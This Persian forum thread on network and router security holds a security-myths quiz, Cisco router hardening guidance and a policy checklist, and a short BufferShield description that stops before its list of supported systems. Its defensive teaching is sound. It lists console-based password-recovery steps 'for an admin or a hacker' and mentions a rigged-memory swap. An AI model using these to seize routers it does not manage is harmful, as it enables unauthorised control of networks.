درست – درست است كه خطرهاي مالي در سايتهاي فقط اطلاعاتي كمتر از سايتهاي تجاري مي باشد ولي خطر مربوط به شهرت و اعتبار، آنها را بيشتر تهديد مي كند. سازمانها نيازمند اين مي باشند كه مداوم سايت هاي اطلاع رساني را بازبيني كنند تا به تهديد هاي احتمالي شبكه هاي خود خيلي سريع پي ببرند و در مقابل آنها واكنش نشان دهند تا از خسارتهايي كه ممكن است شهرت آنها را بر باد دهد جلوگيري كنند.

10-رمزهاي عبور مي تواند جلو كساني كه دسترسي فيزيكي به شبكه را دارند ، بگيرد. درست يا غلط ؟
غلط – كلمات رمز نوعا خيلي كم مي توانند جلو كارمندان داخلي و خبره را بگيرند. بسياري از سازمانها تمامي تلاش خود را روي امور تكنيكي امنيت اطلاعات صرف مي كنند و در برخورد با مسائل اداري و كنترل دسترسي فيزيكي لازم براي ايجاد يك محافظت مناسب ، با شكست مواجه مي شوند.

11-يك نام كاربري و يك رمز عبور مي تواند شبكه ما را از ارتباط با يك شبكه غيردوستانه (Unfriendly ) محافظت كند. درست يا غلط ؟
غلط – يك ارتباط فيزيكي و يك آدرس شبكه همه آنچيزي مي باشد كه يك نفوذگر براي نفوذ در شبكه نياز دارد.با يك ارتباط مي توان تمامي ترافيك شبكه را جذب كرد (به اين كار Sniffing مي گويند ) . مهاجم قادر است با استفاده از تكنيكهاي Sniffing كل ترافيك حساس شبكه ، شامل تركيباتي از نام كاربري/رمز عبور را جذب كند و در حملات بعدي از آنها استفاده كند.

12-هيچكسي در سازمان نبايد به رمزهاي عبور دسترسي داشته باشد به جز مدير امنيت شبكه . درست يا غلط ؟
غلط – هيچ كس در سازمان نبايد به كلمات رمز كاربران دسترسي داشته باشد ، حتي مدير امنيتي شبكه! رمزهاي عبور بايد به صورت رمز شده (Encrypted ) ذخيره شوند. براي كاربران جديد ابتدا با يك رمز عبور ساخته شده اجازه ورود به شبكه داده مي شود و پس از آن بايد روالي قرار داد تا كاربران بتوانند در هر زماني كلمات رمز خود را تغيير دهند. همچنين بايد سياستهايي را براي مواردي كه كاربران رمزهاي عبور خود را فراموش كرده اند در نظر گرفت.

13- رمزگذاري بايد براي ترافيك هاي داخلي شبكه به خوبي ترافيك خروجي شبكه انجام گيرد. درست يا غلط ؟
درست – به عنوان يك نكته بايد گفت كه فرآيند Sniffing (جذب داده هايي كه روي شبكه رد و بدل مي شود) به عنوان يك خطر امنيتي داخلي و خارجي مطرح مي شود.

14-امنيت داده ها در طول انتقال آنها هدف رمزگذاري است . درست يا غلط ؟
غلط – رمزگذاري همچنين مي تواند جامعيت (Integrity ) ، تصديق (Authentication ) و عدم انكار (nonrepudiation ) داده ها را نيز پشتيباني كند.

pastoo
20-09-2006, 18:45
مسير ياب علاوه بر قابليت هاي اتصال شبكه هاي مختلف به يكديگر، در زمينه امنيتي نيز مي تواند مورد استفاده قرار گيرد. در اين بخش نحوه برقراري امنيت در لبه شبكه توسط مسيرياب را بررسي مي كنيم.
شكل زير نمونه اي از ارتباط يك شبكه امن شده با اينترنت مي باشد:




http://www.sgnec.net/admin/images/arts/router1.jpg
علاوه بر آن مسير ياب ميتواند به صورت يكي از عناصر(لايه محافظتي) در روش دفاع در عمق بوده و از ابتداي ارتباط شبكه با دنياي خارج كار محافظت را انجام دهد.
مطابق شكل زير، مسيريابي كه در لبه شبكه قرار گرفته و به عنوان اولين نقطه كنترلي مي باشد، به Screen Router معروف است. اين مسير ياب داراي مسير هاي ثابتي است(Static route) كه شبكه داخلي را به فايروال ارتباط مي دهد. فايروال موجود نيز كنترل هاي بيشتري را روي ارتباطات انجام ميدهد. علاوه بر اين ميتواند كار تصديق هويت كاربران را نيز انجام دهد. بدليل اينكه مسير ياب داراي روش هاي امنيتي بيشتري براي اين كار مي باشد پيشنهاد ميشود كه اين كار توسط مسير ياب انجام گردد.






http://www.sgnec.net/admin/images/arts/Router2.jpg
روش ديگر استفاده از يك مسيرياب بين فايروال و شبكه داخلي، و مسير ياب دوم بين فايروال و اينترنت مي باشد. اين راه قابليت اعمال كنترل ها را در دو نقطه ميسر مي سازد علاوه بر اين در اين طرح ميتوان يك شبكه بين دو مسير ياب داشت كه به ناحيه غير نظامي (de-militarized zone) معروف است. اغلب اين ناحيه براي سرور هايي كه بايد از اينترنت در دسترس باشند، استفاده ميگردد.



http://www.sgnec.net/admin/images/arts/router3.jpg

بعد از اينكه ارتباطات و طراحي امن شبكه صورت گرفت، پياده سازي رويه و روال هاي كنترلي روي ارتباطات (Packetfiltering)انجام خواهد شد.

كنترل بسته هاي TCP/IP:
فيلترينگ بسته هاي TCP/IP امكان كنترل اطلاعات منتقل شده بين شبكه ها را بر اساس آدرس و پروتكل هاي ارتباطي ميسر ميسازد.
مسيرياب ها روشهاي مختلفي را جهت كنترل دارند. بعضي از آنها فيلترهايي دارند كه روي سرويس هاي شبكه در هر دو مسير ورودي و خروجي اعمال ميكند ولي انواع ديگر آنها تنها در يك جهت كنترل را اعمال مي كنند.( سرويس هاي زيادي دو سوي مي باشند. به طور مثال كاربر از كامپيوتر A به كامپيوتر B ، Telnet كرده و كامپيوتر B اطلاعاتي را به كامپيوتر A مي فرستد به همين دليل مسير ياب ها براي كنترل اين گونه ارتباطات نياز به كنترل دو سوي دارد). بيشتر مسير ياب ها ميتوانند بسته ها را بر اساس:
- آدرس مبدا
- آدرس مقصد
- پورت مورد استفاده مبدا و مقصد
- نوع پروتكل مورد استفاده
كنترل كنند.
از قابليت هاي ديگر روتر، فيلتر بر اساس وضعيت مختلف بيت هاي آدرس مي باشد. اگر چه روترها نسبت به محتويات بسته ها(Data) كنترلي نخواهند داشت.
فيلترينگ بسته ها، از مزاياي بسيار مهم مسير ياب هايي است كه بين شبكه هاي امن و ديگرشبكه ها قرار ميگيرد. در اين توپولوژي، مسيرياب ميتواند سياست امنيتي را اعمال كند يا پروتكل ها را Rejectنمايد و يا اينكه پورت ها را مطابق سياست نامه امنيتي بسته نگه دارد.
فيلترها از نظر اعمال محدوديت روي آدرس اهميت فراوان دارند. به طور مثال در شكل زير، مسير ياب مي بايست مشخص كند، بسته هاي اطلاعاتي را كه از فايروال به خارج شبكه فرستاده مي شوند، بايد دامنه خاصي از آدرس را داشته باشند. اين محدوديت بنام كنترل خروجي يا Egress filtering معروف است.
همين روش براي ارتباطات ورودي نيز صحيح است و به نام كنترل ورودي يا Ingress filter مشخص ميشوند.





http://www.sgnec.net/admin/images/arts/router4.jpg


حذف پروتكل هايي كه داراي ريسك بالايي هستند، از ديگر از مواردي است كه مي توان روي مسيرياب انجام داد. جدول زير نشان دهنده سرويس ها و پورت هاي آنها مي باشد كه بايد روي مسير ياب غير فعال گردند.



http://www.sgnec.net/admin/images/arts/Router5.jpg

http://www.sgnec.net/admin/images/arts/router6.jpg
و جدول زير شامل سرويس ها يا پورت هايي هستند كه مي بايست در برابر دسترسي كابران خارجي، روي خود مسير ياب غير فعال شوند تا از دسترسي غير مجاز به مسير ياب و اطلاعات شبكه جلوگيري كند:




http://www.sgnec.net/admin/images/arts/router7.jpg

معمولا سازمان ها يا شركت ها بسته به نوع استفاده از اينترنت، داراي ليست استانداردي از پورتهاي مورد نياز مي باشند كه باز بوده و پورت هاي غير از اين ليست غير فعال ميشوند. در بيشتر موارد، فيلترينگ بايد روي ترافيك خروجي و ورودي اعمال شود تا بتوان از حمله هاي احتمالي به شبكه جلوگيري به عمل آورد. در قسمت بعد به بررسي سياست نامه امنيتي مسير ياب و چك ليست امنيتي آن خواهيم پرداخت.

pastoo
20-09-2006, 18:48
شكل زير نمونه ي از يك شبكه عمومي مي باشد، ساختار و آدرس دهي كه در قسمت هاي مختلف به آنها اشاره شده است، مطابق شكل اين شكل مي باشد:




http://www.sgnec.net/admin/images/arts/router_security1.JPG
شكل فوق بعنوان نمونه امني از شبكه نيست در حاليكه بيشتر شبكه هاي سازمان ها به صورت فوق پياده سازي مي شوند

امنيت دسترسي به مسير ياب:
در اين قسمت روشهايي را براي محافظت از خود مسير ياب بررسي مي كنيم كه شامل دسترسي فيزيكي، محافظت از اسامي كاربري روي مسيرياب، محافظت از نرم افزار مسيرياب، وظايف مدير شبكه، و تنظيماتي كه بايد رعايت شود. هنگامي كه به امنيت فكر مي كنيد، پياده سازي اين شرايط براي تمامي تجهيزات روي شبكه بايد انجام شود.

امنيت فيزيكي:
اگر شخصي به قسمتي از شبكه دسترسي داشته باشد، نمي توان از تغييراتي كه اعمال مي كند جلوگيري نمود
و به راحتي مي تواند كل شبكه را تسخير كند. بنابراين حدود دسترسي به منابع و اطلاعات در شبكه از موارد اوليه است كه بايد رعايت شود. يكي از قابليت هاي سيستم هاي امنيتي تعريف محدوديت هاي دسترسي مي باشد.
عناصر تشكيل دهنده ساختار شبكه مانند مسيرياب ها از دو جهت نقش مهمي را در شبكه ايفا مي كنند يكي حفاظت از بخش هايي كه توسط آنها تفكيك شده و ديگر آنكه اگر داراي امنيت مناسب نباشد جهت حمله به نقاط ديگر مورد استفاده قرار مي گيرد.
تجهيرات شبكه، از جمله سوئيچ ها و مسيرياب ها بايد در مكاني قرار داشته باشند كه از لحاظ دسترسي فيزيكي محدود شده باشند. و دسترسي به اين مكان بايد توسط اشخاصي كه داراي دسترسي مديريتي هستند صورت گيرد. اين منطقه مي بايست توسط رويه روال هاي امنيتي مانند درب هاي امنيتي، و يا كنترل هاي الكترونيكي و... حفاظت شوند ولي اين حفاظت نبايد اشكالي در ورود مديران به اين منطقه ايجاد كند.
حفاظت فيزيكي به اين دليل مهم مي باشد كه با دسترسي به مسيرياب به راحتي و با استفاده از مراحل حذف كلمه رمز(Password recovery) قابل اجرا است. با اين روش مي توان براحتي به قسمت هاي حساس مسيرياب دست يافت. روشهاي دسترسي به بخشهاي حساس در مسيرياب هاي مختلف متفاوت مي باشد و معمولا مراحل مشخص مي باشد. براي حذف كلمه عبور مي بايست مدير و يا هكر بايد به پورت كنسول مسيرياب متصل شده و مراحل زير را انجام دهد:
- تنظيم مسيرياب براي اينكه در مرحله بوت شدن فايل هايي كه از قبل وجود دارند(NVRAM) خوانده نشده و مستقيم وارد قسمت مديريتي مسيرياب شود.
- راه اندازي مجدد مسيرياب
- دسترسي به محيط Accessبدون نياز به نام كاربري
- بررسي كلمه هاي عبوري و يا حذف فايل هاي ذخيره شده
- تنظيم مسيرياب براي اينكه فايل جديد ذخيره شده در (NVRAM) خوانده شود
- راه اندازي مجدد مسيرياب
دليل ديگري كه امنيت فيزيكي مي بايست رعايت شود، اين است كه مسيرياب ها داراي حافظه هاي جانبي هستند. هكر با استفاده از حافظه هايي كه داراي سيستم عامل ميباشد و تمامي تنظيماتي كه مورد نياز هكر مي باشد روي اين سيستم عامل اعمال شده است، براحتي مي تواند اين حافظه را جايگزين كرده و مسيرياب را مجدد راه اندازي نمايد اين نوع از حمله، اگر حرفه اي انجام شود براحتي قابل تشخيص نخواهد بود.
محيط قرار گيري مسيرياب بايد عاري از امواج مغناطيسي و همجنين از لحاظ رطوبت و دما كنترل شده باشد.

نسخه هاي نرم افزاري مسيرياب:
نرم افزار مسيرياب در بازه زماني مختلف بروز رساني شده و مشكلات مربوط به آن بر طرف مي شود از اينرو دريافت اين نرم افزار و كنترل اينكه مسيرياب داراي نرم افزار بروز مي باشد، از روشهاي جلوگيري از حمله مي باشد. براي كنترل نسخه نرم افزار مسيرياب پس از ارتباط با مسيرياب از دستور show version استفاده كنيد.

تنظيم مسيرياب و دستورات آن:
پس از ارتباط با مسيرياب و login كردن، در محيط user mode كه به نام Exec mode هم معروف است قرار خواهيد گرفت. اين محيط دسترسي محدودي را به كاربر مي دهد. دسترسي به دستوراتي كه شامل تغيير تنظيمات اصلي مي باشد در محيط Priviledg EXEC mode اجازه استفاده دارند. اين محيط بعنوان Enable mode نيز شناخته مي شود. پس از ورود به محيط فوق، براي ايجاد انواع تغييرات و تنظيمات روي مسيرياب از دستور Config t استفاده كنيد. قسمت هاي مختلفي براي اعمال تنظيمات موجود است كه تعدادي از آنها عبارتند از :


• interface (config-if): is used to configure aspects of a particular interface like FastEthernet0, Ethernet 0/1, or Vlan2.
• Line (config-line): is used to set up the console port, auxiliary port and virtual terminal lines.
• Access-list: There are two types of IP named access lists, extended (config-ext-n) and standard (config-std-n), which can be used instead of numbered lists. Access-list mode is used for building named access lists.
• Route (config-route): is where specific parameters can be set and modified for a selected routing protocol.


در جهت استاندارد كردن نحوه تصديق هويت و مشخص كردن حدود دسترسي و امكان رديابي عملكرد در مسيرياب، امكان جديدي رو مسيرياب ها از نسخه 11.1 به بعد ايجاد شد كه به authentication, (authorization, accountig)AAA معروف است. با استفاده از اين قابليت ميتوان كنترل هاي امنيتي بيشتري را روي مسيرياب پياده سازي نمود. كه نحوه عملكرد آنها را در بخش بعدي بررسي مي كنيم.


ترافيك شبكه مسيرياب و نقش :Loopback interface
وظيفه اصلي مسيرياب انتقال اطلاعات بين شبكه ها ميباشد اما خود مسيرياب نيز ترافيك ايجاد مي كند. مسيرياب ها و تجهيزات ديگر شبكه، با پروتكل هاي مختلفي مانند پروتكل هاي مسيريابي، SNMP,NTP, TFTP ، تبادل اطلاعات مي كنند. هنگامي كه مسيرياب ارتباطي را برقرار مي كند، كه اين ارتباط مي بايست داراي آدرس مبداء باشد، معمولا مسيرياب آدرسي را كه به يكي از Interface هاي خود تخصيص داده شده را استفاده مي كند. اين روش ممكن است در بعضي از سرويس ها اختلال ايحاد نمايد.
علاوه بر phisycal interface هاي روتر، قابليت ديگري در نرم افزارهاي(IOS) مسيرياب قرارداده شده كه بتوان توسط آن Interfaceهاي مجازي ياLoopback ايجاد كرد. بهترين تمرين داشتن يكي از اين Interface ها در مسيرياب است كه به عنوان آدرس مبداء ترافيك هايي خود مسيرياب استفاده شود. استفاده از اين روش در روشهاي مديريت شبكه و پياده سازي راهكارهاي امنيت مناسب است بدين ترتيب كه آدرس مبداء ترافيك ها و يا سرويسهاي ايجاد شده توسط مسيرباب ثابت است و ميتوان كنترل ها امنيتي بيشتري را روي تجهيزات ديگر پياده كرد. Loopback Interfaceتنها با تخصيص يك آدرس به آن، ايحاد مي شود. در مسير ياب هاي لبه شبكه(Boarder router) اين آدرس مي بايست در دامنه آدرس شبكه داخلي يا ناحيهDMZ باشد نه در دامنه‌ي خارج شبكه. همچنين توجه داشته باشيد كه اين آدرس با هيچ يك از Interface هاي مسيرياب تداخل نداشته باشد و حتي مانند آدرس هاي استفاده شده در شبكه داخلي نباشد.
http://www.sgnec.net/admin/images/arts/routersecurity1.JPG
دسترسي هاي، نامهاي كاربري، رمزهاي عبور:
: Logins and Banners
پياده سازي نشانه(Banner)، پيغامي جهت آگاهي، بر روي مسيرياب الزامي است. اين پيغام مي تواند شامل ثبت دستورات كاربري كه به مسيرياب متصل شده و يا موارد ديگر باشد. براي تنظيم اين اخطار ميتوانيد با مشاور حقوقي سازمان مشورت كنيد. اين پيغام نبايد شامل اطلاعاتي در مورد تجهيزات و يا آدرسهايي باشد كه در شبكه مورد استفاده قرار گرفته است. براي ايجاد پيغام ميتوانيد از دستور

Banner motddelimiter message delimiter
استفاده نماييد. پورت كنسول(Con) براي اعمال تنظيمات و مديريت روتر مورد استفاده قرار ميگيرد. ميتوانيد كامپيوتري را به صورت دائمي به اين پورت متصل نماييد با اين شرط كه از دسترسي غيرمجاز به آن جلوگيري شده و در محيط كاملا امن قرار داشته باشد. اين ارتباط بايد داراي مدت زمان بدون فعاليت باشد تا بعداز اين زمان ارتباط قطع شود. مثال زير روش اعمال اين تنظيمات را نشان ميدهد:

http://www.sgnec.net/admin/images/arts/routersecurity2.JPG


هر كاربري مي بايست با نام كاربري خود به مسيرياب دسترسي داشته باشد. با دستور Login local كه روي پورت كنسول فعال مي شود، ميتوان كاربر را وادار به Login كرد.
توجه داشته باشيد كه حداقل يك كاربر تعريف نماييد در غير اينصورت نميتوانيد به مسيرياب دسترسي داشته باشيد. قبل از اينكه از دستور Login local استفاده نماييد حداقل يك كاربر تعريف نماييد تا بتوانيد به مسيرياب Login كنيد. نحوه تعريف كاربر به روش زير مي باشد:

Usernamename privilegelevel passwordstring
مثال زير چگونگي تعريف كاربر و تخصيص دسترسي به آن را نشان مي دهد:


http://www.sgnec.net/admin/images/arts/routersecurity3.JPG

پورت هاي Aux در صورت وجود مي بايست غير فعال شوند. مثال زير چگونگي غير فعال كردن پورت Aux را نشان مي دهد:

http://www.sgnec.net/admin/images/arts/routersecurity4.JPG

VTYو مديريت از راه دور:

يكي از راههاي مديريت مسيرياب اتصال به مسير ياب با استفاده از Telnet يا SSH مي باشد كه اين نوع ارتباطات به Virtual terminal line معروف هستند. اين راههاي ارتباطي در صورتي كه نيازي به آنها نيست بايد غير فعال شوند. مديريت از راه دور مسيرياب بدون داشتن رمزنگاري مطمئن خطرناك است، چرا كه هر شخصي براحتي ميتواند با استفاده از ابزارهاي شنود، نام كاربري و رمز عبور مسيرياب را پيدا كرده و به آن دسترسي داشته باشد. براي غير فعال كردن دسترسي به مسيرياب از طريق VTY ها، ميتوانيد ليست دسترسي تعريف كرده و كليه دسترسي ها را مسدود نماييد يا از دستور Transport input noneاستفاده نماييد. نكته قابل توجه اين كه اين محدوديت ها را در صورتي كه از راه Telnet به مسيرياب متصل هستيد استفاده نكنيد: مثال زير نمونه اي از روش بالا را نشان ميدهد:


http://www.sgnec.net/admin/images/arts/routersecurity5.JPG
بيشتر IOS ها داراي پنجVTY هستند، از صفر تا چهار، و نسخه هاي پيشرفته آنها پانزده يا شصت و چهار و يا بيشتر هم دارند.اينكه مسيرياب داراي چند VTY مي باشد از نكات بسيار مهم و قابل توجه است كه مي بايست به صورت كاملا امن تنطيم شوند. براي اينكه تعداد VTY مسيرياب مشخص شود از دستور زير استفاده كنيد:
http://www.sgnec.net/admin/images/arts/ROUTERSECURITY6.JPG
خروجي اين دستور نشانگر اين است كه اين مسير ياب داراي هفت VTY مي باشد.
معمولا بايد VTY روي مسيرياب تنظيم شوند و يا اينكه به تعداد مورد نظر فعال باشند و بقيه غير فعال شوند.

http://www.sgnec.net/admin/images/arts/ROUTERSECURITY7.JPG
در قسمت بعد دسترسي ها و نوع سطوح دسترسي به مسيرياب را بررسي خواهيم كرد.


- دسترسي ها:
Cisco IOS داراي 16 سطح دسترسي، از صفر تا 15 مي باشد. به صورت پيش فرض IOS داراي دو سطح دسترسي مي باشد. اين دو شامل محيط User EXEc كه در سطح دسترسي 1 و Enable كه به محيط priviledeged EXEc معروف است و در سطح دسترسي 15 مي باشد، تقيسم مي شوند. هر يك از دستوراتIOS در يكي از سطوح 1 يا 15 قرار دارند. اگر از دستور aaanew-model استفاده شود ميتوان از امكان AAA به صورت Local يا Remote استفاده كرد. به صورت پيش فرض در سطح دسترسي اول دستورات خاص و محدودي قابل اجرا هستند، مثال زير چگونگي اضافه كردن دستورات مورد نياز را به محيط EXEXc نشان ميدهد:
http://www.sgnec.net/admin/images/arts/router_security_1.JPG
دستور آخر براي انتقال مجدد Show ip به سطح 1 لازم است. اغلب نياز به تعريف بيش از دو سطج دسترسي به دستورات مسيرياب مي باشد. اين كار توسط تخصيص رمز عبور به سطوح مياني(بعنوان مثال سطح 5 يا 10) و سپس مشخص كردن دستوراتي كه در هر لايه قابل اجرا مي باشند، پياده سازي مي شود.
مواردي كه در تعريف اين سطوح مي بايست رعايت شوند:
- از دستور Username براي تعريف كاربر در لايه بالاتر از سطح اول استفاده نشود براي اين كار از دستور Enable Secret استفاده كنيد تا بتوانيد سطح مورد نظر را تعيين كنيد.
- از تعريف سطوح دسترسي زياد خودداري كنيد. ممكن است باعث ايجاد حفره هاي امنيتي ناخواسته در سيستم شود.
- در مورد تخصيص دستوراتي كه براي تنظيم مسيرياب استفاده مي شوند، به لايه هاي ديگر، نهايت دقت را انجام دهيد زيرا با اينكار كاربري كه دسترسي به يك دستور را داشته باشد مي تواند تغييراتي را روي تنظيمات اصلي مسيرياب ايجاد كند.
كلمه هاي عبور:
دو روش براي استفاده از كلمه هاي عبور در IOS وجود دارد. استفاده از مدل 7 كه از پروتكل هاي رمزنگاري Ciscoاستفاده مي كند و از امنيت كمتري برخوردار مي باشد، روش دوم استفاده از مدل 5 مي باشد كه به صورت MD5 بوده و داراي امنيت بالاتري است.پيشنهادCiscoاستفاده از مدل 5 بجاي مدل 7 مي باشد.
برا ي محافظت از محيط Priviedeg EXEc از دستور enable password استفاده نكنيد و به جاي آن دستورenable secret را وارد كنيد:
http://www.sgnec.net/admin/images/arts/router_security_2.JPG
نام هاي كاربري :
ابتدا بايد اشخاصي كه مجوز دسترسي به مسيرياب را دارند، داراي نام و رمز عبوري مخصوص خود باشند. علاوه بر اين براي مشخص شدن اينكه چه كسي تغيير در مسيرياب ايجاد مي كند و اين تغييرات با نام شخص، ثبت شوند بايد از Log هاي مسيرياب استفاده گردد. نام كاربري را بدون رمز عبور ايجاد نكنيد و در صورتي كه به نام كاربري، نياز نيست اين كاربر را حذف نماييد. شكل زير چگونگي ايجاد و حذف كاربر را نشان مي دهد:
http://www.sgnec.net/admin/images/arts/router_security_3.JPG
تعداد كاربراني را كه به محيط Configuration دسترسي دارند را محدود كنيد.
- دسترسي راه دور:
- دسترسي از راه دور غيرفعال مي باشد و مدير شبكه بايد از طريق كنسول مسيرياب را مديريت كند.
- دسترسي از راه دور- از شبكه داخلي و توسط AAA : كه در اين حالت مدير شبكه ميتواند تنها از شبكه داخلي و مطابق با كنترل هاي AAA با مسيرياب ارتباط داشته باشد.
- دسترسي راه دور- از شبكه داخلي بدون استفاده از AAA : در اين روش مدير شبكه ميتواند تنها از شبكه داخلي به مسيرياب متصل شود.
- دسترسي راه دور- از خارج شبكه توسط AAA: در اين ارتباط مدير شبكه از هر دو ناحيه داخلي و خارجي و توسطAAAبه مسيرياب متصل شود.
- دسترسي به مسيرياب از خارج شبكه: مدير شبكه ميتواند از هر دو ناحيه به مسيرياب متصل شود.
يكي از موارد مهمي كه در ارتباطات راه دور اهميت بالاي دارد امنيت اطلاعات بين فرستنده و گيرنده مي باشد. بدين ترتيب كه اگر رمزنگاري مناسب روي اين ارتباطات انجام نگرفته باشد، براحتي مي توان با ابزارهاي شنود، نام كاربر و رمز عبور را پيدا كرد.
امنيت ارتباطات راه دور توسط پروتكل هاي امنيتي مانند SSH يا IPSEC قابل افزايش مي باشد.
مترجم : مهدي سعادت (مدير واحد امنيت اطلاعات مشورت)

pastoo
20-09-2006, 18:49
مسير ياب يكي از قسمت هاي مهم شبكه است و امنيت آن براي شبكه اي كه به آن سرويس مي دهد، از اهميت بالايي بر خوردار مي باشد.
معني امنيت براي مسيرياب چيست؟
يك تعريف ساده براي امنيت مسير ياب اين است كه آيا عملكرد، تنظيمات و مديريت آن مطابق اساس نامه امنيتي شما است؟
مفاهيم اوليه اساس نامه امنيتي براي مسير ياب:
شكل زير لايه هاي امنيتي براي مسيرياب را نشان مي دهد و امنيت هر لايه به امنيت لايه داخلي آن وابسته است.

http://www.sgnec.net/admin/images/arts/router_security.JPG
داخلي ترين لايه، امنيت فيزيكي مسيرياب مي باشد. هر مسير ياب در صورتي كه دسترسي فيزيكي به آن موجود باشد براحتي مي توان كنترل آن را در دست گرفت. به همين دليل اين لايه در مركز تمام لايه ها قرار دارد و بايد مورد توجه قرار گيرد.
بيشتر مسيرياب ها داراي يك يا دو مسير مستقيم براي اعمال تنظيمات دارند كه به پورت كنسول معروف هستند.در سياست نامه امنيتي بايد قواعدي را براي نحوه دسترسي به اين پورت ها، تعريف كرد.
لايه بعدي، نرم افزار و تنظيمات خود مسيرياب مي باشد. هر گاه هكري بتواند كنترل هر كدام از اين قسمت ها را بدست آورد، مي تواند كنترل لايه هاي بيروني خود را نيز در دست گيرد. اطلاعات مربوط به نام كاربر، آدرس مربوط به Interface هاي مسيرياب، ليست هاي كنترلي و موارد مهم ديگر در اين لايه نگه داري مي شوند. اين اطلاعات در صورتي كه در دسترس نفوذ گر قرار گيرند، به راحتي ميتواند مسير گردش اطلاعات در شبكه داخلي را مختل نمايد. معمولا در سياست نامه امنيتي چگونگي دسترسي به اين لايه مشخص مي شود.
لايه بعدي، مشخصات مربوط به تنظيمات پوياي مسيرياب مي باشد. از مهمترين اين قسمت ها جدول مسير يابي مي باشد. اطلاعات ديگر كه شامل وضعيت Interface ها و جدول ARP و AuditLog ها هم از عناصر مهم اين لايه مي باشند. دسترسي به اين لايه نيز، مانند لايه هاي پايين تر، براي لايه هاي خارجي مشكل ساز خواهد بود.
خارجي ترين لايه، ترافيك مربوط به شبكه هايي است كه مسيرياب آنها را به هم متصل مي سازد. به دليل اينكه استفاده از پروتكل هاي نا امن ميتوانند امنيت اين لايه را با خطر مواجه سازند بنابراين در سياست نامه امنيتي كه براي مسيرياب تدوين خواهد شد، نوع سرويس ها و پروتكل هاي ارتباطي كه اجازه عبور دارند و يا غير مجاز هستند، مي بايست مشخص شوند.
تدوين سياست نامه امنيتي براي مسيرياب:
چند نكته مهم براي تدوين اين سياست نامه بايد رعايت شود:
- مشخص كردن : تعريف رويه و روال ها بدون مشخص كردن دستورات Security Objectives
- مشخص كردن سياست امنيتي مانند شكل قبل و تدوين چگونگي دسترسي به هركدام
- غير فعال كردن سرويس هايي كه غير مجاز هستند
در بعضي موارد مشخص كردن اينكه چه سرويس هايي مجاز هستند، مفيد نخواهد بود، به طور مثال مسيريابي كه در بستر اصلي شبكه قرار دارد و ارتباط بين شبكه هاي مختلف را برقرار مي سازد مي بايست داراي سياست نامه امنيتي مناسبي در جهت سرويس دهي به اين شبكه ها باشد و حتي كنترل هاي سطحي براي ارتباطات داشته باشد زيرا ارتباط در بستر اصلي بايد از سرعت بالاتر برخوردار بوده و موارد اصلي را تحت پوشش قرار دهد.
سياست نامه امنيتي بايد يك سند زنده و در حال بروز رساني باشد. اين سياست نامه نيز بايد جزئي از سياست نامه كلي امنيتي باشد كه به طور كلي اجرا و بروز رساني شود.
اعمال تغييرات در سياست نامه امنيت مسيرياب نيز بايد پس از هر تغيير انجام شود. در واقع اين سياست نامه بايد در زمان هاي مشخص و يا در مواردي كه تغييراتي چون،
ايجاد يك ارتباط بين شبكه داخلي و خارج
تغييرات كلي در ساختار مديريت شبكه و يا رويه و روال ها
اصلاحات كلي در ساختار امنيتي شبكه
اضافه كردن عناصري به شبكه مانند ديواره آتش و يا VPN Connection
تشخيص حمله به شبكه و يا در كنترل گرفتن قسمتي از آن
بازنگري شود.
چك ليست سياست نامه امنيتي مسيرياب:
پس از تهيه نسخه اول سياست نامه امنيتي مسيرياب اين سياست نامه را مطابق ليست زير چك نماييد تا تمام اجزاي آن با سند امنيتي شما مطابق باشد.
امنيت فيزيكي:
مشخص كردن اينكه چه شخصي مسئول نصب و يا راه اندازي مجدد مسيرياب مي باشد.
معين كردن شخصي براي نگهداري سخت افزار مسيرياب و يا تغيير سخت افزاري آن.
تعيين فردي كه ميتواند ارتباط فيزيكي به مسيرياب داشته باشد.
تعريف كنترل ها براي دسترسي به مسيرياب و رابط هاي ديگر آن.
تعريف رويه روال براي برگشت به قبل از خرابي مسيرياب.
امنيت تنظيمات ثابت روي مسيرياب:
مشخص كردن فرد يا افرادي كه ميتوانند به مسيرياب از راههاي مختلف متصل شوند.
مشخص كردن فردي كه ميتواند حدود دسترسي مديريت مسيرياب را داشته باشد.
تعريف رويه روال براي نام ها و كلمه هاي عبور و يا كلمه هاي عبوري كه به دسترسي كامل منجر خواهد شد كه شامل زمان و يا شرايطي است كه بايد اين كلمات عوض شوند.
تعريف رويه و روال هاي براي برگشت به حالت قبل و مشخص كردن فرد يا افراد مورد نظر
امنيت تنظيمات متغير:
شناخت سرويس هايي كه در مسيرياب فعال مي باشند و شبكه هايي كه بايد به اين سرويس ها دسترسي داشته باشند.
مشخص كردن پروتكل هايي كه براي مسيريابي مورد استفاده قرار مي گيرند و قابليت هاي امنيتي كه روي هركدام بايد فعال شود.
تعريف رمزنگاري مناسب در ارتباطات VPN
سرويسهاي امنيتي شبكه:
مشخص كردن پروتكل ها، پورت ها، و سرويس هايي كه بايد توسط مسيرياب اجازه داده شوند و يا مسدود شوند.
تعريف رويه روال در جهت كنترل ارتباطات با شبكه سرويس دهنده اينترنت.

مشخص كردن اينكه هنگامي كه شبكه و يا مسيرياب هك شود، چه شخص يا اشخاصي بايد مطلع شده و چه روالي بايد انجام شود از ديگر اقدامات كنترل مسيرياب مي باشد كه در سند امنيتي بايد تعريف شود که در بخش قبل بررسی کردیم .
.

منبع:

Akin, T., Hardening Cisco Routers, O’Reilly & Associates,

pastoo
22-09-2006, 11:50
BufferShield یک ابزار امنیتی برای خانواده Windows می باشد که از هک شدن آنها توسط حملات Buffer overflows جلوگیری می کند . هم چنین جلوی بسیاری از حملات را نیز می گیرد .
همان گونه که خودتان می دانید حملات Buffer overflows به هکرها و ویروس نویسان این امکان را می دهد که malicious code های خود را بر روی سیستم شما اجرا کنند ، پس همان گونه که خود می دانید دفاع در برابر این گونه حملات جزو واجبات است .
نسخه تجاری این نرم افزار تنها برای سیستم عامل های Microsoft موجود می باشد که در آن می توانید مشخص کند که کدام برنامه محافظت بشود و یا کدام برنامه محافظت نشود . هم چنین این نرم افزار امکان استثناء قرار دادن قسمتی از حافظه که برنامه های آن قسمت باید اجرا شوند را دارد و این در بعضی از مواقع ضروری است زیرا بعضی از برنامه ها dynamic code خود را در stack و یا heap بوجود می آورند و بعد از آن سعی در اجرای ان می کنند.

خصوصیات :
· کشف کدهای اجرایی در stack ، heap پیش فرض ، dynamic heap ، virtual memory و data segment
· درصورت کشف Buffer overflows توانایی از بین بردن برنامه در حال اجرا را دارد
· توانایی انتقال گزارش به event log ویندوز در صورت کشف overflows

BufferShield توانایی اجرا در این سیستم ها را دارد :
